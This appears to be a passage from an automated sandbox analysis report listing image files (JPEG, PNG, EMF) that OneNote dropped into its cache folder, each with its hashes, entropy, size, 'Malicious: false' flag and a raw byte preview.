SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A0.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A1.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A2.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A4.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A6.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A8.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
